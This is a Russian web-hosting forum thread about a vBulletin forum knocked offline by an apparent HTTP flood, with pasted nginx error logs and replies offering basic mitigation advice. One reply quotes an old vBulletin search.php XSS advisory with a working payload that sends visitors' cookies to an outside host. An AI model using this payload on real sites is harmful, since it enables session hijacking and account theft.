Форум Сайтостроение Веб-строительство

DDos или взломали - worker_connections are not enough while connecting to upstream ?

E
На сайте с 23.10.2008
Offline
225
eavy
7332

Ребята, прошу помощи :(

Арендую VPS. Сегодня ночью на нем легли все сайты.

Ошибка - 500.

Сразу начал стучать хостеру, мол в чём дело.

Получил ответ, что проблема с некоторым сайтом sait.ru

Это форум на Vbulletin 3.8

Проблема заключается в следующем, цитирую:

В логе nginx очень много одновременных обращений к:

http://www.site/forum/register.php
http://www.site.ru/forum/search.php?do=process

Из-за этого лог файл очень быстро переполняется и занимает все свободное дисковое пространство(12G) Мы сейчас отключили этот домен, работа остальных сайтов восстановлена.

В общем, отключили этот проблемный домен и "спросили", не производил ли я каких либо изменений с этим доменом.

Изменений конечно не производилось. Посещалка осталась на прежнем уровне. Трафика вообще копейки, что то около 300 в сутки.

Переписку с хостером я отложил до утра, утром попросил "включить" домен, мол не работает всю ночь.

На что получил ответ, что сайт включали, проблема возобновилась. И они провели анализ домена и предполагают, что он возможно был скомпрометирован и мне необходимо посмотреть файлы на предмет даты последнего изменения и их размеры.

Посмотрел, ничего сверхъестественного и подозрительного пока не обнаружил. Копаюсь.

В логе такие ошибки: 

2012/10/09 16:47:34 [alert] 31950#0: *7364525 5120 worker_connections are not enough while connecting to upstream, client: 58.9.124.237, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364527 5120 worker_connections are not enough while connecting to upstream, client: 223.204.20.144, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364523 5120 worker_connections are not enough while connecting to upstream, client: 72.27.64.217, server: site.ru, request: "GET /forum/register.php HTTP/1.1", upstream: "http://www.site.ru/forum/register.php", host: "www.site.ru", referrer: "http://www.site.ru/forum/register.php"

2012/10/09 16:47:34 [alert] 31950#0: *7364529 5120 worker_connections are not enough while connecting to upstream, client: 223.204.160.182, server: site.ru, request: "GET /forum/search.php?do=process HTTP/2.0", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7292581 5120 worker_connections are not enough while connecting to upstream, client: 70.26.29.130, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364533 5120 worker_connections are not enough while connecting to upstream, client: 78.188.68.249, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364540 5120 worker_connections are not enough while connecting to upstream, client: 24.12.28.126, server: site.ru, request: "GET /forum/search.php?do=process HTTP/2.0", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: *7364541 5120 worker_connections are not enough while connecting to upstream, client: 78.188.68.249, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: *7284463 5120 worker_connections are not enough while connecting to upstream, client: 78.56.141.70, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364552 5120 worker_connections are not enough while connecting to upstream, client: 201.3.196.145, server: site.ru, request: "GET /forum/search.php?do=process HTTP/2.0", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: *7194001 5120 worker_connections are not enough while connecting to upstream, client: 189.13.251.120, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364565 5120 worker_connections are not enough while connecting to upstream, client: 88.243.125.252, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364570 5120 worker_connections are not enough while connecting to upstream, client: 64.90.240.90, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: *7364577 5120 worker_connections are not enough while connecting to upstream, client: 58.9.124.237, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: 5120 worker_connections are not enough

2012/10/09 16:47:34 [alert] 31950#0: *7364581 5120 worker_connections are not enough while connecting to upstream, client: 78.188.68.249, server: site.ru, request: "GET /forum/register.php HTTP/1.1", upstream: "http://www.site.ru/forum/register.php", host: "www.site.ru", referrer: "http://www.site.ru/forum/register.php"

2012/10/09 16:47:34 [alert] 31950#0: *7364587 5120 worker_connections are not enough while connecting to upstream, client: 223.204.20.144, server: site.ru, request: "GET /forum/search.php?do=process HTTP/1.1", upstream: "http://www.site.ru/forum/search.php?do=process", host: "www.site.ru", referrer: "http://www.site.ru/forum/search.php?do=process"

2012/10/09 16:47:34 [alert] 31950#0: *7364595 5120 worker_connections are not enough while connecting to upstream, client: 187.171.154.51, server: site.ru, request: "GET /forum/register.php HTTP/1.0", upstream: "http://www.site.ru/forum/register.php", host: "www.site.ru", referrer: "http://www.site.ru/forum/register.php"

И так повторяются до бесконечности.

В этом ничерта не понимаю, но видно что с разных ip "долбят" форум, а именно регистрацию и поиск.

Посоветуйте пожалуйста, что делать? Это DDos? Или может сломали что то?

Хостер тоже, "отрубил" сайт и как то никакой активности по этому вопросу не проявляет. Я даже не знаю, что спросить или потребовать. Да и вообще, должен ли.

IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#1
Из-за этого лог файл очень быстро переполняется и занимает все свободное дисковое пространство(12G)

эм.. ну отключить лог в nignx-е :)

В этом ничерта не понимаю, но видно что с разных ip "долбят" форум, а именно регистрацию и поиск.

Можно временно закрыть их (регистрацию и поиск).. если без них поднимется - дальше смотреть..

От мелких масштабов могут защитить "стандартные" средства (вроде такого)

Можно оставить поиск только для зарегистрированных (можно допилить и отсекать на уровне nginx-а), URL-ы поиска и регистрации сменить (? если в спам-базу попал, может и помочь)

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
Как сделать платную регистрацию Является ли спам форумов Что проверить после подозрительного
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#2

взято с форума античат

vBulletin 3.0

3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
www.сom/forumpath/search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

в гугле много вариантов, отключи поиск и регистрацию, ищи заплатку...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
E
На сайте с 23.10.2008
Offline
225
eavy
#3

Отключили запись логов. Пока помогает )

По статистике форума, вчера было одновременное пребывание 11,876 "человек". Которые регистрировались и использовали поиск.

Отключение поиска, регистрации ничего не дает. Тоже самое. Отключил форум, всё равно обращения идут.

Но интересно, почему их счетчики не видят. Как будто бы их нет.

kgtu5, спасибо, поищу. Хоть у меня и не 3.0, а 3.8

А куда копать вообще?

nginx/1.15.8 - как включить Etxt Антиплагиат 2.0. Проверка Обсудим фильтр Яндекса "ты
IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#4
eavy:
Но интересно, почему их счетчики не видят. Как будто бы их нет.

счётчики (вроде Liveinternet, метрики итд) используют javascript, а обращения, скорее всего, генерируются программами-спамилками, которые не исполняют JS, (либо выборочно, например, только с конкретного домена)

C
На сайте с 26.03.2005
Offline
114
Cosinus
#5

да ДДОС это, точнее HTTP flood

в легких случаях помогает эта штука

http://klavasoft.com/antiddos

php/js/mysq - ПРИНИМАЮ ЗАКАЗЫ. telegram @zzmaster2

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий